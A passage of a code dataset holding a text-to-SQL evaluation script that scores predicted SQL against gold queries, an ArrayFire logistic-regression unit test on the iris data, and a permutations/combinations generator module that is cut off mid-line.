acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['select'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['select(no AGG)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_where(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['where'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)\n res['where(no OP)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_group(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group(no Having)'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_having(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['group'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_order(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['order'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_and_or(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['and/or'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_IUEN(pred, label)\n acc, rec, f1 = get_scores(cnt, pred_total, label_total)\n res['IUEN'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n label_total, pred_total, cnt = eval_keywords(pred, label)\n acc, rec, f1 = 
get_scores(cnt, pred_total, label_total)\n res['keywords'] = {'acc': acc, 'rec': rec, 'f1': f1,'label_total':label_total,'pred_total':pred_total}\n\n return res\n\n\ndef isValidSQL(sql, db):\n conn = sqlite3.connect(db)\n cursor = conn.cursor()\n try:\n cursor.execute(sql)\n except:\n return False\n return True\n\n\ndef print_scores(scores, etype):\n levels = ['easy', 'medium', 'hard', 'extra', 'all']\n partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\n\n print(\"{:20} {:20} {:20} {:20} {:20} {:20}\".format(\"\", *levels))\n counts = [scores[level]['count'] for level in levels]\n print(\"{:20} {:<20d} {:<20d} {:<20d} {:<20d} {:<20d}\".format(\"count\", *counts))\n\n if etype in [\"all\", \"exec\"]:\n print('===================== EXECUTION ACCURACY =====================')\n this_scores = [scores[level]['exec'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(\"execution\", *this_scores))\n\n if etype in [\"all\", \"match\"]:\n print('\\n====================== EXACT MATCHING ACCURACY =====================')\n exact_scores = [scores[level]['exact'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(\"exact match\", *exact_scores))\n print('\\n---------------------PARTIAL MATCHING ACCURACY----------------------')\n for type_ in partial_types:\n this_scores = [scores[level]['partial'][type_]['acc'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(type_, *this_scores))\n\n print('---------------------- PARTIAL MATCHING RECALL ----------------------')\n for type_ in partial_types:\n this_scores = [scores[level]['partial'][type_]['rec'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(type_, *this_scores))\n\n print('---------------------- PARTIAL MATCHING F1 --------------------------')\n for type_ in partial_types:\n this_scores = [scores[level]['partial'][type_]['f1'] for level in levels]\n print(\"{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}\".format(type_, *this_scores))\n\n\ndef evaluate(gold, predict, db_dir, etype, kmaps, infer_list):\n with open(gold) as f:\n glist = [l.strip().split('\\t') for l in f.readlines() if len(l.strip()) > 0]\n # print('gold',len(glist))\n # with open(predict) as f:\n plist = predict.copy()\n\n # plist = [(\"select max(Share),min(Share) from performance where Type != 'terminal'\", \"orchestra\")]\n # glist = [(\"SELECT max(SHARE) , min(SHARE) FROM performance WHERE TYPE != 'Live final'\", \"orchestra\")]\n # print('predict',len(plist))\n evaluator = Evaluator()\n\n levels = ['easy', 'medium', 'hard', 'extra', 'all']\n partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',\n 'group', 'order', 'and/or', 'IUEN', 'keywords']\n entries = []\n scores = {}\n result_entries = []\n\n for level in levels:\n scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}\n scores[level]['exec'] = 0\n for type_ in partial_types:\n scores[level]['partial'][type_] = {'acc': 0., 'rec': 0., 'f1': 0.,'acc_count':0,'rec_count':0}\n\n eval_err_num = 0\n i=0\n for p, g in zip(plist, glist):\n p_str = p\n g_str, db = g\n db_name = db\n db = os.path.join(db_dir, db, db + \".sqlite\")\n schema = Schema(get_schema(db))\n\n g_sql = get_sql(schema, g_str)\n # print('gold',g_sql)\n hardness = evaluator.eval_hardness(g_sql)\n scores[hardness]['count'] += 1\n 
scores['all']['count'] += 1\n        try:\n            p_sql = get_sql(schema, p_str)\n            # print('predicted',p_sql)\n        except:\n            p_sql = {\"except\":None,\n            \"from\": {\n                \"conds\": [],\n                \"table_units\": []\n            },\n            \"groupBy\": [],\n            \"having\": [],\n            \"intersect\": None,\n            \"limit\": None,\n            \"orderBy\": [],\n            \"select\": [\n                False,\n                []\n            ],\n            \"union\": None,\n            \"where\": []\n            }\n            eval_err_num += 1\n            # print(\"eval_err_num:{}\".format(eval_err_num))\n\n        # rebuild sql for value evaluation\n        kmap = kmaps[db_name]\n        g_valid_col_units = build_valid_col_units(g_sql['from']['table_units'], schema)\n        # print(g_sql)\n        g_sql = rebuild_sql_val(g_sql)\n        # print(g_sql)\n        g_sql = rebuild_sql_col(g_valid_col_units, g_sql, kmap)\n        # print(g_sql)\n        p_valid_col_units = build_valid_col_units(p_sql['from']['table_units'], schema)\n        import copy\n        p_sql = rebuild_sql_val(p_sql)\n        # print('pred',p_sql)\n        p_sql = rebuild_sql_col(p_valid_col_units, p_sql, kmap)\n        # print('pred',p_sql)\n        p_sql_new = copy.deepcopy(p_sql)\n        g_sql_new = copy.deepcopy(g_sql)\n        exec_score = exact_score = partial_scores = None  # defaults so the result entry below cannot raise a NameError when etype is \"exec\"- or \"match\"-only\n        if etype in [\"all\", \"exec\"]:\n            exec_score = eval_exec_match(db, p_str, g_str, p_sql, g_sql)\n            # print(p_sql,g_sql)\n            if exec_score:\n                scores[hardness]['exec'] += 1.0\n                scores['all']['exec'] += 1.0\n            # result_entries.append({\n            #     'db_id': db,\n            #     'nl_qn': infer_list[i],\n            #     'predictSQL': p_str,\n            #     'goldSQL': g_str,\n            #     'hardness': hardness,\n            #     'exact': exact_score,\n            #     'partial': partial_scores,\n            #     'gold_sql':g_sql_new,\n            #     'predicted_sql':p_sql_new,\n            #     'execution':exec_score\n            # })\n\n        if etype in [\"all\", \"match\"]:\n            exact_score = evaluator.eval_exact_match(p_sql, g_sql)\n            # print(p_sql,g_sql)\n            partial_scores = evaluator.partial_scores\n            # print(p_sql,g_sql)\n            # if exact_score == 0:\n            #     # print(\"{} pred: {}\".format(hardness,p_str))\n            #     # print(\"{} gold: {}\".format(hardness,g_str))\n            #     print(\"\")\n            scores[hardness]['exact'] += exact_score\n            scores['all']['exact'] += exact_score\n            for type_ in partial_types:\n                if partial_scores[type_]['pred_total'] > 0:\n                    scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']\n                    scores[hardness]['partial'][type_]['acc_count'] += 1\n                if partial_scores[type_]['label_total'] > 0:\n                    scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']\n                    scores[hardness]['partial'][type_]['rec_count'] += 1\n                scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']\n                if partial_scores[type_]['pred_total'] > 0:\n                    scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']\n                    scores['all']['partial'][type_]['acc_count'] += 1\n                if partial_scores[type_]['label_total'] > 0:\n                    scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']\n                    scores['all']['partial'][type_]['rec_count'] += 1\n                scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']\n\n            # entries.append({\n            #     'predictSQL': p_str,\n            #     'goldSQL': g_str,\n            #     'hardness': hardness,\n            #     'exact': exact_score,\n            #     'partial': partial_scores\n            # })\n            result_entries.append({\n                'db_id': db_name,\n                'nl_qn': infer_list[i],\n                'predictSQL': p_str,\n                'goldSQL': g_str,\n                'hardness': hardness,\n                'exact': exact_score,\n                'partial': partial_scores,\n                'gold_sql':g_sql_new,\n                'predicted_sql':p_sql_new,\n                'execution':exec_score\n            })\n        i+=1\n\n    # for level in levels:\n    #     if scores[level]['count'] == 0:\n    #         continue\n    #     if etype in [\"all\", \"exec\"]:\n    #         scores[level]['exec'] /= scores[level]['count']\n\n    #     if etype in [\"all\", \"match\"]:\n    #         scores[level]['exact'] /= scores[level]['count']\n    #         for type_ in partial_types:\n    #             if 
scores[level]['partial'][type_]['acc_count'] == 0:\n # scores[level]['partial'][type_]['acc'] = 0\n # else:\n # scores[level]['partial'][type_]['acc'] = scores[level]['partial'][type_]['acc'] / \\\n # scores[level]['partial'][type_]['acc_count'] * 1.0\n # if scores[level]['partial'][type_]['rec_count'] == 0:\n # scores[level]['partial'][type_]['rec'] = 0\n # else:\n # scores[level]['partial'][type_]['rec'] = scores[level]['partial'][type_]['rec'] / \\\n # scores[level]['partial'][type_]['rec_count'] * 1.0\n # if scores[level]['partial'][type_]['acc'] == 0 and scores[level]['partial'][type_]['rec'] == 0:\n # scores[level]['partial'][type_]['f1'] = 1\n # else:\n # scores[level]['partial'][type_]['f1'] = \\\n # 2.0 * scores[level]['partial'][type_]['acc'] * scores[level]['partial'][type_]['rec'] / (\n # scores[level]['partial'][type_]['rec'] + scores[level]['partial'][type_]['acc'])\n # print(scores)\n #print_scores(scores, etype)\n return result_entries\n\n\ndef eval_exec_match(db, p_str, g_str, pred, gold):\n \"\"\"\n return 1 if the values between prediction and gold are matching\n in the corresponding index. Currently not support multiple col_unit(pairs).\n \"\"\"\n conn = sqlite3.connect(db)\n cursor = conn.cursor()\n try:\n cursor.execute(p_str)\n p_res = cursor.fetchall()\n except:\n return False\n\n cursor.execute(g_str)\n q_res = cursor.fetchall()\n\n def res_map(res, val_units):\n rmap = {}\n for idx, val_unit in enumerate(val_units):\n key = tuple(val_unit[1]) if not val_unit[2] else (val_unit[0], tuple(val_unit[1]), tuple(val_unit[2]))\n rmap[key] = [r[idx] for r in res]\n return rmap\n\n p_val_units = [unit[1] for unit in pred['select'][1]]\n q_val_units = [unit[1] for unit in gold['select'][1]]\n return res_map(p_res, p_val_units) == res_map(q_res, q_val_units)\n\n\n# Rebuild SQL functions for value evaluation\ndef rebuild_cond_unit_val(cond_unit):\n if cond_unit is None or not DISABLE_VALUE:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n if type(val1) is not dict:\n val1 = None\n else:\n val1 = rebuild_sql_val(val1)\n if type(val2) is not dict:\n val2 = None\n else:\n val2 = rebuild_sql_val(val2)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_val(condition):\n if condition is None or not DISABLE_VALUE:\n return condition\n\n res = []\n for idx, it in enumerate(condition):\n if idx % 2 == 0:\n res.append(rebuild_cond_unit_val(it))\n else:\n res.append(it)\n return res\n\n\ndef rebuild_sql_val(sql):\n if sql is None or not DISABLE_VALUE:\n return sql\n\n sql['from']['conds'] = rebuild_condition_val(sql['from']['conds'])\n sql['having'] = rebuild_condition_val(sql['having'])\n sql['where'] = rebuild_condition_val(sql['where'])\n sql['intersect'] = rebuild_sql_val(sql['intersect'])\n sql['except'] = rebuild_sql_val(sql['except'])\n sql['union'] = rebuild_sql_val(sql['union'])\n\n return sql\n\n\n# Rebuild SQL functions for foreign key evaluation\ndef build_valid_col_units(table_units, schema):\n col_ids = [table_unit[1] for table_unit in table_units if table_unit[0] == TABLE_TYPE['table_unit']]\n prefixs = [col_id[:-2] for col_id in col_ids]\n valid_col_units= []\n for value in schema.idMap.values():\n if '.' 
in value and value[:value.index('.')] in prefixs:\n valid_col_units.append(value)\n return valid_col_units\n\n\ndef rebuild_col_unit_col(valid_col_units, col_unit, kmap):\n if col_unit is None:\n return col_unit\n\n agg_id, col_id, distinct = col_unit\n if col_id in kmap and col_id in valid_col_units:\n col_id = kmap[col_id]\n if DISABLE_DISTINCT:\n distinct = None\n return agg_id, col_id, distinct\n\n\ndef rebuild_val_unit_col(valid_col_units, val_unit, kmap):\n if val_unit is None:\n return val_unit\n\n unit_op, col_unit1, col_unit2 = val_unit\n col_unit1 = rebuild_col_unit_col(valid_col_units, col_unit1, kmap)\n col_unit2 = rebuild_col_unit_col(valid_col_units, col_unit2, kmap)\n return unit_op, col_unit1, col_unit2\n\n\ndef rebuild_table_unit_col(valid_col_units, table_unit, kmap):\n if table_unit is None:\n return table_unit\n\n table_type, col_unit_or_sql = table_unit\n if isinstance(col_unit_or_sql, tuple):\n col_unit_or_sql = rebuild_col_unit_col(valid_col_units, col_unit_or_sql, kmap)\n return table_type, col_unit_or_sql\n\n\ndef rebuild_cond_unit_col(valid_col_units, cond_unit, kmap):\n if cond_unit is None:\n return cond_unit\n\n not_op, op_id, val_unit, val1, val2 = cond_unit\n val_unit = rebuild_val_unit_col(valid_col_units, val_unit, kmap)\n return not_op, op_id, val_unit, val1, val2\n\n\ndef rebuild_condition_col(valid_col_units, condition, kmap):\n for idx in range(len(condition)):\n if idx % 2 == 0:\n condition[idx] = rebuild_cond_unit_col(valid_col_units, condition[idx], kmap)\n return condition\n\n\ndef rebuild_select_col(valid_col_units, sel, kmap):\n if sel is None:\n return sel\n distinct, _list = sel\n new_list = []\n for it in _list:\n agg_id, val_unit = it\n new_list.append((agg_id, rebuild_val_unit_col(valid_col_units, val_unit, kmap)))\n if DISABLE_DISTINCT:\n distinct = None\n return distinct, new_list\n\n\ndef rebuild_from_col(valid_col_units, from_, kmap):\n if from_ is None:\n return from_\n\n from_['table_units'] = [rebuild_table_unit_col(valid_col_units, table_unit, kmap) for table_unit in from_['table_units']]\n from_['conds'] = rebuild_condition_col(valid_col_units, from_['conds'], kmap)\n return from_\n\n\ndef rebuild_group_by_col(valid_col_units, group_by, kmap):\n if group_by is None:\n return group_by\n\n return [rebuild_col_unit_col(valid_col_units, col_unit, kmap) for col_unit in group_by]\n\n\ndef rebuild_order_by_col(valid_col_units, order_by, kmap):\n if order_by is None or len(order_by) == 0:\n return order_by\n\n direction, val_units = order_by\n new_val_units = [rebuild_val_unit_col(valid_col_units, val_unit, kmap) for val_unit in val_units]\n return direction, new_val_units\n\n\ndef rebuild_sql_col(valid_col_units, sql, kmap):\n if sql is None:\n return sql\n\n sql['select'] = rebuild_select_col(valid_col_units, sql['select'], kmap)\n sql['from'] = rebuild_from_col(valid_col_units, sql['from'], kmap)\n sql['where'] = rebuild_condition_col(valid_col_units, sql['where'], kmap)\n sql['groupBy'] = rebuild_group_by_col(valid_col_units, sql['groupBy'], kmap)\n sql['orderBy'] = rebuild_order_by_col(valid_col_units, sql['orderBy'], kmap)\n sql['having'] = rebuild_condition_col(valid_col_units, sql['having'], kmap)\n sql['intersect'] = rebuild_sql_col(valid_col_units, sql['intersect'], kmap)\n sql['except'] = rebuild_sql_col(valid_col_units, sql['except'], kmap)\n sql['union'] = rebuild_sql_col(valid_col_units, sql['union'], kmap)\n\n return sql\n\n\ndef build_foreign_key_map(entry):\n cols_orig = entry[\"column_names_original\"]\n tables_orig = 
entry[\"table_names_original\"]\n\n # rebuild cols corresponding to idmap in Schema\n cols = []\n for col_orig in cols_orig:\n if col_orig[0] >= 0:\n t = tables_orig[col_orig[0]]\n c = col_orig[1]\n cols.append(\"__\" + t.lower() + \".\" + c.lower() + \"__\")\n else:\n cols.append(\"__all__\")\n\n def keyset_in_list(k1, k2, k_list):\n for k_set in k_list:\n if k1 in k_set or k2 in k_set:\n return k_set\n new_k_set = set()\n k_list.append(new_k_set)\n return new_k_set\n\n foreign_key_list = []\n foreign_keys = entry[\"foreign_keys\"]\n for fkey in foreign_keys:\n key1, key2 = fkey\n key_set = keyset_in_list(key1, key2, foreign_key_list)\n key_set.add(key1)\n key_set.add(key2)\n\n foreign_key_map = {}\n for key_set in foreign_key_list:\n sorted_list = sorted(list(key_set))\n midx = sorted_list[0]\n for idx in sorted_list:\n foreign_key_map[cols[idx]] = cols[midx]\n\n return foreign_key_map\n\n\ndef build_foreign_key_map_from_json(table):\n with open(table) as f:\n data = json.load(f)\n tables = {}\n for entry in data:\n tables[entry['db_id']] = build_foreign_key_map(entry)\n return tables", "repo_name": "PrachiJainxD/text-to-sql", "sub_path": "contributions/experiments/rewritten_utterance/error_analysis.py", "file_name": "error_analysis.py", "file_ext": "py", "file_size_in_byte": 46986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 122, "usage_type": "call"}, {"api_name": "json.load", "line_number": 139, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 166, "usage_type": "call"}, {"api_name": "json.load", "line_number": 580, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1049, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1049, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 1095, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 1096, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 1200, "usage_type": "call"}, {"api_name": "json.load", "line_number": 1423, "usage_type": "call"}]}
+{"seq_id": "36140976505", "text": "# -*- compile-command: \"cd .. && ./6-unittest-af.sh\"; -*-\nimport unittest\nimport numpy\nfrom d3m import container, utils\nfrom d3m.metadata import base as metadata_base\nfrom common_primitives import dataframe_to_ndarray, dataset_to_dataframe, ndarray_to_dataframe\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.utils import shuffle\ndef M(s):\n print(s)\n return s\n\nimport arrayfire as af\nimport af_LogisticRegression\n\n\nrng = np.random.RandomState(0)\n\niris = datasets.load_iris()\niris.data, iris.target = shuffle(iris.data, iris.target, random_state=rng)\n\ndef ints_to_onehots(ints, num_classes):\n onehots = np.zeros((ints.shape[0], num_classes), dtype='float32')\n onehots[np.arange(ints.shape[0]), ints] = 1\n return onehots\n\nclass RefAfLogisticRegression:\n def __init__(self, alpha=0.1, lambda_param=1.0, maxerr=0.01, maxiter=1000, verbose=False):\n self.__alpha = alpha\n self.__lambda_param = lambda_param\n self.__maxerr = maxerr\n self.__maxiter = maxiter\n self.__verbose = verbose\n self.__weights = None\n\n\n def predict_proba(self, X):\n Z = af.matmul(X, self.__weights)\n return af.sigmoid(Z)\n\n\n def predict_log_proba(self, X):\n return af.log(self.predict_proba(X))\n\n\n def predict(self, X):\n probs = self.predict_proba(X)\n _, classes = af.imax(probs, 1)\n return classes\n\n\n def cost(self, X, Y):\n # Number of samples\n m = Y.dims()[0]\n\n dim0 = self.__weights.dims()[0]\n dim1 = self.__weights.dims()[1] if len(self.__weights.dims()) > 1 else None\n dim2 = self.__weights.dims()[2] if len(self.__weights.dims()) > 2 else None\n dim3 = self.__weights.dims()[3] if len(self.__weights.dims()) > 3 else None\n # Make the lambda corresponding to self.__weights(0) == 0\n lambdat = af.constant(self.__lambda_param, dim0, dim1, dim2, dim3)\n\n # No regularization for bias weights\n lambdat[0, :] = 0\n\n # Get the prediction\n H = self.predict_proba(X)\n\n # Cost of misprediction\n Jerr = -1 * af.sum(Y * af.log(H) + (1 - Y) * af.log(1 - H), dim=0)\n\n # Regularization cost\n Jreg = 0.5 * af.sum(lambdat * self.__weights * self.__weights, dim=0)\n\n # Total cost\n J = (Jerr + Jreg) / m\n\n # Find the gradient of cost\n D = (H - Y)\n dJ = (af.matmulTN(X, D) + lambdat * self.__weights) / m\n\n return J, dJ\n\n\n def train(self, X, Y):\n # Initialize parameters to 0\n self.__weights = af.constant(0, X.dims()[1], Y.dims()[1])\n\n for i in range(self.__maxiter):\n # Get the cost and gradient\n J, dJ = self.cost(X, Y)\n err = af.max(af.abs(J))\n if err < self.__maxerr:\n print('Iteration {0:4d} Err: {1:4f}'.format(i + 1, err))\n print('Training converged')\n return self.__weights\n\n if self.__verbose and ((i+1) % 10 == 0):\n print('Iteration {0:4d} Err: {1:4f}'.format(i + 1, err))\n\n # Update the weights via gradient descent\n self.__weights = self.__weights - self.__alpha * dJ\n\n if self.__verbose:\n print('Training stopped after {0:d} iterations'.format(self.__maxiter))\n\n\n def eval(self):\n af.eval(self.__weights)\n af.sync()\n\n\nclass AFLogisticLogisticRegression(unittest.TestCase):\n def test_basic(self):\n num_classes = np.unique(iris.target).shape[0]\n\n # Convert numpy array to af array; convert labels from ints to one-hot encodings\n train_feats = af.from_ndarray(iris.data.astype('float32'))\n train_targets = af.from_ndarray(ints_to_onehots(iris.target.astype('uint32'), num_classes))\n test_feats = af.from_ndarray(iris.data.astype('float32'))\n test_targets = af.from_ndarray(ints_to_onehots(iris.target.astype('uint32'), 
num_classes))\n\n num_train = train_feats.dims()[0]\n num_test = test_feats.dims()[0]\n\n ref_clf = RefAfLogisticRegression(alpha=0.1, # learning rate\n lambda_param = 1.0, # regularization constant\n maxerr=0.01, # max error\n maxiter=1000, # max iters\n verbose=False # verbose mode\n )\n\n ref_clf.train(train_feats, train_targets)\n af_output = ref_clf.predict(test_feats)\n ref_output = af_output.to_ndarray()\n print('Completed reference calculation')\n\n # import pdb; pdb.set_trace()\n\n # actual d3m attempted arrayfire fails w/ missing columns method\n hyperparams = af_LogisticRegression.Hyperparams.defaults()\n\n test_clf = af_LogisticRegression.af_LogisticRegression(hyperparams=hyperparams)\n train_set = iris.data\n targets = iris.target\n test_clf.set_training_data(inputs=train_set, outputs=targets)\n test_clf.fit()\n\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "pv-pterab-s/bootstrap-d3m-arrayfire-docker", "sub_path": "tests/test_af_LogisticRegression.py", "file_name": "test_af_LogisticRegression.py", "file_ext": "py", "file_size_in_byte": 5065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.RandomState", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 20, "usage_type": "name"}, {"api_name": "sklearn.utils.shuffle", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "arrayfire.matmul", "line_number": 39, "usage_type": "call"}, {"api_name": "arrayfire.sigmoid", "line_number": 40, "usage_type": "call"}, {"api_name": "arrayfire.log", "line_number": 44, "usage_type": "call"}, {"api_name": "arrayfire.imax", "line_number": 49, "usage_type": "call"}, {"api_name": "arrayfire.constant", "line_number": 62, "usage_type": "call"}, {"api_name": "arrayfire.sum", "line_number": 71, "usage_type": "call"}, {"api_name": "arrayfire.log", "line_number": 71, "usage_type": "call"}, {"api_name": "arrayfire.sum", "line_number": 74, "usage_type": "call"}, {"api_name": "arrayfire.matmulTN", "line_number": 81, "usage_type": "call"}, {"api_name": "arrayfire.constant", "line_number": 88, "usage_type": "call"}, {"api_name": "arrayfire.max", "line_number": 93, "usage_type": "call"}, {"api_name": "arrayfire.abs", "line_number": 93, "usage_type": "call"}, {"api_name": "arrayfire.eval", "line_number": 110, "usage_type": "call"}, {"api_name": "arrayfire.sync", "line_number": 111, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 116, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 119, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 120, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 121, "usage_type": "call"}, {"api_name": "arrayfire.from_ndarray", "line_number": 122, "usage_type": "call"}, {"api_name": "af_LogisticRegression.Hyperparams.defaults", "line_number": 142, "usage_type": "call"}, {"api_name": "af_LogisticRegression.Hyperparams", "line_number": 142, "usage_type": "attribute"}, {"api_name": "af_LogisticRegression.af_LogisticRegression", "line_number": 144, 
"usage_type": "call"}, {"api_name": "unittest.main", "line_number": 153, "usage_type": "call"}]}
+{"seq_id": "23339043319", "text": "\"\"\"\nperm_comb\n\nperm_comb=permutations+combinations:\n\tcombinations('ABCD', 2) --> AB AC AD\n\tpermutations('ABCD', 2) --> AB AC AD BA BC\n\tperm_comb :: [a]->[uint]->[[{a}]]\n\tcomb_comb :: [a]->{uint:uint}->[{{a}}]\n\tperm :: [a]->uint->[[a]]\n\tcomb :: [a]->uint->[{a}]\n\tperm(it,n)~perm_comb(it,[1]*n)\n\tcomb(it,n)~perm_comb(it,[n])\n\n\"\"\"\n\n\nfrom common_short_hand import *\nfrom itertools import (\n\tpermutations\n\t, product as product_\n\t, combinations\n\t, combinations_with_replacement\n\t)\n\n#perm_comb :: [a]->[uint]->[[{a}]]\n#comb_comb :: [a]->{uint:uint}->[{{a}}]\n\n\n\n\n#product==_permutations_with_replacement\ndef _combinations_with_replacement(n, r):\n\t# combinations_with_replacement('ABC', 2) --> AA AB AC BB BC CC\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[sorted_le[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[sorted_le[uint{%n}]{len=r}]\n\trange(r,n)\n\tif n<0 or r<0 or (n==0 and r>0):\n\t\treturn\n\t\n\tindices = [0] * r\n\tyield tuple(indices)\n\tn1 = n-1\n\twhile True:\n\t\tfor i in reversed(range(r)):\n\t\t\tif indices[i] != n1:\n\t\t\t\tbreak\n\t\telse:\n\t\t\treturn\n\t\tindices[i:] = [indices[i] + 1] * (r - i)\n\t\tyield tuple(indices)\n#product==_permutations_with_replacement\ndef _permutations_with_replacement(n, r):\n\t# product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy\n\t# product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[[uint{%n}]{len=r}]\n\trange(r,n)\n\tif n<0 or r<0 or (n==0 and r>0):\n\t\treturn\n\t\n\tindices = [0] * r\n\tyield tuple(indices)\n\tn1 = n-1\n\twhile True:\n\t\tfor i in reversed(range(r)):\n\t\t\tif indices[i] != n1:\n\t\t\t\tbreak\n\t\telse:\n\t\t\treturn\n\t\tindices[i] += 1\n\t\tindices[i+1:] = [0] * (r-1 - i)\n\t\tyield tuple(indices)\n\ndef _combinations(n, r):\n\t# combinations('ABCD', 2) --> AB AC AD BC BD CD\n\t# combinations(range(4), 3) --> 012 013 023 123\n\t# :: uint -> uint -> [{uint}]\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[sorted_lt[uint]]\n\t# :: @n:uint. @r:uint. sorted_lt[sorted_lt[uint{%n}]{len=r}]\n\trange(r,n)\n\tit = _combinations_with_replacement(n-r+1, r)\n\trs = range(r)\n\tfor indices in it:\n\t\tyield tuple(map(opss.add, rs, indices))\n\ndef _permutations(n, r):\n\t# permutations('ABCD', 2) --> AB AC AD BA BC BD CA CB CD DA DB DC\n\t# permutations(range(3)) --> 012 021 102 120 201 210\n\t# :: uint -> uint -> [[uint]]\n\t# :: uint -> uint -> sorted_lt[unique[uint]]\n\t# :: @n:uint. @r:uint. 
sorted_lt[unique[uint{%n}]{len=r}]\n\trange(r,n)\n\tif not 0 <= r <= n:\n\t\treturn\n\t\n\tidc = list(range(n))\n\t#js = list(range(1, r+1))\n\tjs = [nnn]*r\n\ti = 0\n\t\"\"\"\n\t0 <= i <= r\n\tidc[:i] fixed\n\tidc[i:] sorted_lt\n\t[n>=i'>=i>0]:\n\t\tj = js[i'-1]\n\t\t0 <= i'-1 < j <= n\n\t\tk = idc[i'-1]\n\t\tidc[j-1] <= k\n\t\t[j idc[n-1]\n\t\t\t#if __debug__:\n\t\t\tnew_i1 = i1\n\t\t\tnew_i = i1+1\n\t\t\tassert 0 < new_i <= i == r\n\t\t\ttry:\n\t\t\t\tassert all(idc[x] > idc[x+1] for x in rg(new_i, i-1))\n\t\t\t\tassert not new_i idc[n-1]\n\t\t\t\t#too slow:assert all(idc[x] < idc[x+1] for x in rg(i, n-1))\n\t\t\t\tif new_i < i:\n\t\t\t\t\tassert all(idc[x] < idc[x+1] for x in rg(i, n-1))\n\t\t\texcept:\n\t\t\t\tprn(\"n,r; i,new_i,j; js; idc\", locs())\n\t\t\t\traise\n\t\t\t#swap i1,j\n\t\t\t#before swap, restore idc[i1+1:]\n\t\t\t\n\t\t\tif new_i < i:\n\t\t\t\t#restore idc[new_i:]\n\t\t\t\t#bug: idc[new_i:] = idc[i:] + idc[new_i:i]\n\t\t\t\tidc[new_i:] = [*idc[i:], 